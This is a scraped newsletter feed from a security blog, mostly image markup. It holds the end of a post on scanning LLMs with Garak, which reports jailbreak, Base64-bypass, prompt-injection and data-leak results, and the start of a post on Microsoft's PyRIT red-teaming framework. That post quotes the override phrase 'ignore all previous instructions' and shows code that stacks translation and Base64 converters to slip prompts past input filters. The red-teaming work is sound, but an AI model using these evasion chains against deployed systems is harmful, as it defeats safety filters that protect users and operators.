https://substackcdn.com/image/fetch/$s_!sSq-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 848w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 1272w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!sSq-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png" width="1083" height="926" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:926,&quot;width&quot;:1083,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:125166,&quot;alt&quot;:&quot;Garak Scan: CLI Output: Garak LLM vulnerability scanner CLI output showing dan, encoding, promptinject, and leakreplay probe modules with progress bars and pass-fail rates against an OpenAI gpt-5-nano target.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694931?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Garak Scan: CLI Output: Garak LLM vulnerability scanner CLI output showing dan, encoding, promptinject, and leakreplay probe modules with progress bars and pass-fail rates against an OpenAI gpt-5-nano target." title="Garak Scan: CLI Output: Garak LLM vulnerability scanner CLI output showing dan, encoding, promptinject, and leakreplay probe modules with progress bars and pass-fail rates against an OpenAI gpt-5-nano target." srcset="https://substackcdn.com/image/fetch/$s_!sSq-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 424w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 848w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 1272w, https://substackcdn.com/image/fetch/$s_!sSq-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F95e0aa5f-7fe8-44d4-b978-87debb503a56_1083x926.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><h3>The Garak Scan That Matters</h3><p>Here&#8217;s what a real Garak scan surfaces. Point it at your production chatbot endpoint. Pick a handful of probe modules: dan, encoding, promptinject, leakreplay. Run it. Maybe twenty minutes depending on rate limits.</p><p>The report comes back. Your model held against DAN 6.0 through 9.0. Good. But DAN 11.0 and Developer Mode v2 both scored failures. The encoding module found that Base64-encoded prompts bypass your input filter entirely: 80% failure rate across ten generations. promptinject hijacking probes landed at 30%. leakreplay found the model regurgitating training data snippets when prompted with specific continuation patterns.</p><p>Four vulnerability classes confirmed in one scan. Base64 bypass alone maps to LLM01:2025 in the <a href="https://www.toxsec.com/p/owasp-top-10-for-genai">OWASP Top 10 for LLMs</a>, the top-ranked vulnerability. The DAN failures map to LLM01 too. The training data leakage maps to LLM02:2025 (Sensitive Information Disclosure), and a packagehallucination hit would map to LLM03:2025 (Supply Chain). Each finding has a full JSONL trail: exact prompts sent, exact responses received, detector verdicts, timestamps.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!_ZYo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!_ZYo!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 424w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 848w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 1272w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png" width="1099" height="989" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:989,&quot;width&quot;:1099,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:74253,&quot;alt&quot;:&quot;Garak Scan: JSONL Hit: Garak LLM vulnerability scanner JSONL hit log entry showing a single encoding.InjectBase64 prompt injection attempt with redacted payload, detector verdict, and timestamp evidence chain for bug bounty reproduction.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694931?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Garak Scan: JSONL Hit: Garak LLM vulnerability scanner JSONL hit log entry showing a single encoding.InjectBase64 prompt injection attempt with redacted payload, detector verdict, and timestamp evidence chain for bug bounty reproduction." title="Garak Scan: JSONL Hit: Garak LLM vulnerability scanner JSONL hit log entry showing a single encoding.InjectBase64 prompt injection attempt with redacted payload, detector verdict, and timestamp evidence chain for bug bounty reproduction." srcset="https://substackcdn.com/image/fetch/$s_!_ZYo!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 424w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 848w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 1272w, https://substackcdn.com/image/fetch/$s_!_ZYo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7779cbde-d25e-48fb-a927-0d8d8da6379f_1099x989.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>This is the part that should bother you. One command. Garak does the rest. Every model deployed without running this scan has the same holes.</p><blockquote><p>We dropped the free chapters. Now breach the wall for the dead-simple step-by-step kill switch that shuts this all down.</p></blockquote>
      <p>
          <a href="https://www.toxsec.com/p/garak-llm-vulnerability-scanner">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[PyRIT AI Red Teaming: Metasploit for LLMs]]></title><description><![CDATA[Microsoft&#8217;s AI red team framework breaks down targets, converters, scorers, and orchestrators for bug bounty work.]]></description><link>https://www.toxsec.com/p/pyrit-ai-red-teaming</link><guid isPermaLink="false">https://www.toxsec.com/p/pyrit-ai-red-teaming</guid><dc:creator><![CDATA[ToxSec]]></dc:creator><pubDate>Sun, 03 May 2026 14:31:20 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!x_Ph!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!x_Ph!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!x_Ph!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png" width="2752" height="1536" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:2752,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:6990692,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694979?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F26d96c1b-f7c0-4391-be03-2cad7fde8390_2752x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!x_Ph!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 424w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 848w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!x_Ph!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F40e7b8a2-2e45-44b1-b939-035db73ea889_2752x1536.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>TL;DR:</strong> PyRIT is Microsoft&#8217;s open-source AI red team framework, battle-tested on 100+ internal operations. It chains targets, converters, scorers, and orchestrators into automated LLM attack campaigns. Converters stack like payload encoders. Orchestrators run Crescendo and TAP, the multi-turn patterns bounty programs pay out on right now. Here&#8217;s how to wire it up.</p><blockquote><p>This is the public feed. Upgrade to see what doesn&#8217;t make it out.</p><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://www.toxsec.com/subscribe?&quot;,&quot;text&quot;:&quot;Subscribe now&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://www.toxsec.com/subscribe?"><span>Subscribe now</span></a></p></blockquote><h2>Why PyRIT Matters for AI Bug Bounty Work</h2><p>Pen testers have Metasploit. Web app hunters have Burp. AI red teaming, until recently, had a guy in a tab retyping &#8220;ignore all previous instructions&#8221; forty different ways and hoping one of them landed.</p><p>PyRIT changes the shape of the work. The Python Risk Identification Tool is Microsoft&#8217;s open-source framework for running structured attack campaigns against LLM systems. Microsoft&#8217;s AI Red Team built it, ran it against more than a hundred internal operations including Phi-3 and Copilot, then open-sourced the whole thing. The repo sits at <a href="https://github.com/microsoft/PyRIT">github.com/microsoft/PyRIT</a> with 3.6k stars as of April 2026, up from 3.4k at the start of the year. It&#8217;s moving fast.</p><p>Here&#8217;s why we care. The Microsoft Security Response Center tied PyRIT directly to their AI bounty program. They&#8217;re telling researchers to use it. Bounty platforms are <a href="https://www.toxsec.com/p/how-to-jailbreak-claude-opus">paying out on automated multi-turn chains</a> against frontier models right now: system prompt leaks, guardrail bypasses, indirect injection through agent tools. The framework chains attack primitives together the same way Metasploit chains exploits, scores every result, and logs every transcript for the bounty write-up.</p><h2>What Are PyRIT&#8217;s Four Core Primitives?</h2><p>Every piece of PyRIT maps to something we already know from offensive tooling. Once the mapping clicks, the rest falls into place.</p><p><strong>Targets are the scope.</strong> A target is whatever we point prompts at: Azure OpenAI, a Hugging Face model, a local Ollama instance, or a custom HTTP endpoint via the HTTPTarget class. Ship-built target classes cover every major provider. HTTPTarget swallows anything that accepts text over a REST API.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zRbF!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zRbF!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 424w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 848w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 1272w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zRbF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png" width="1137" height="217" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b0f696f5-885d-4492-ad57-f884797c3726_1137x217.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:217,&quot;width&quot;:1137,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:21624,&quot;alt&quot;:&quot;PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694979?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." title="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." srcset="https://substackcdn.com/image/fetch/$s_!zRbF!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 424w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 848w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 1272w, https://substackcdn.com/image/fetch/$s_!zRbF!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb0f696f5-885d-4492-ad57-f884797c3726_1137x217.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Converters are payload encoding.</strong> A converter transforms a prompt before it hits the target. </p><ul><li><p>Base64</p></li><li><p>ROT13</p></li><li><p>Leetspeak</p></li><li><p>ASCII art</p></li><li><p>Unicode substitution</p></li><li><p>Translation to a low-resource language</p></li></ul><p>The <a href="https://www.toxsec.com/p/multimodal-prompt-injection-attacks-images-audio">same encoding evasion tricks</a> we&#8217;ve been hand-stacking against input filters, now programmatic. And converters stack. The output of one feeds the next. Translate to Zulu, then Base64, then wrap in a roleplay frame. Three converters, one pipeline. The model reads us clean. The input filter sees noise.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;python&quot;,&quot;nodeId&quot;:&quot;1b70cac1-c5b3-4d4e-ac42-80a2f811c12b&quot;}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-python">from pyrit.prompt_converter import Base64Converter, TranslationConverter

# Stack converters: Zulu, then Base64
converters = [
    TranslationConverter(converter_target=attack_llm, language="zulu"),
    Base64Converter()
]
</code></pre></div><p><strong>Scorers are the success criteria.</strong> After the target responds, a scorer decides if the attack landed. Binary true/false (&#8221;did it comply?&#8221;), Likert scale (&#8221;how harmful, 1 to 5?&#8221;), refusal detection (&#8221;did it say no?&#8221;), or LLM-as-judge where a separate model grades the response. Hunting for system prompt leaks? <code>SelfAskTrueFalseScorer</code> tuned for instruction disclosure. Testing for harmful content? Use a content classifier. The more specific the description, the cleaner the verdict.</p><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3UY0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3UY0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 424w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 848w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 1272w, https://substackcdn.com/image/fetch/$s_!3UY0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3UY0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png" width="1139" height="217" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/b46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:217,&quot;width&quot;:1139,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:23293,&quot;alt&quot;:&quot;PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns.&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://www.toxsec.com/i/193694979?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fb46823a5-ab8b-4935-82d5-c29ffcc72594_1139x217.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." title="PyRIT framework architecture diagram showing four AI red team primitives &#8212; targets, converters, scorers, orchestrators &#8212; and how they chain into automated multi-turn LLM attack campaigns." 